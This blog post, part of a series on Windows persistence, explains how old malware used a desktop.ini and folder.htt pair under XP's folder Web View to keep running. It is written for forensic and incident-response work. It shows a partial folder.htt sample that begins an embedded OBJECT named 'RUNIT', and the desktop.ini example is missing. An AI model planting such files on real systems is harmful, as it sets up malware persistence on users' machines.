Beyond good ol’ Run key, Part 49

November 5, 2016 in Autostart (Persistence), Compromise Detection, Forensic Analysis, Incident Response, Malware Analysis

I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini / folder.htt combo that comes to play when the Web View is chosen for folders (XP or earlier). I know, I know.. it’s archaeology… but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now…

An example Desktop.ini created by the malware looks like this:


and the associated folder.htt like this:

<meta http-equiv="content-type"content="text/html; charset=Windows-1252">
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid= "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100; height: 100" tabIndex=-1>
objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">"

There is not much more I can write here… this is super old-school and I am just adding it for completeness.

Comments are closed.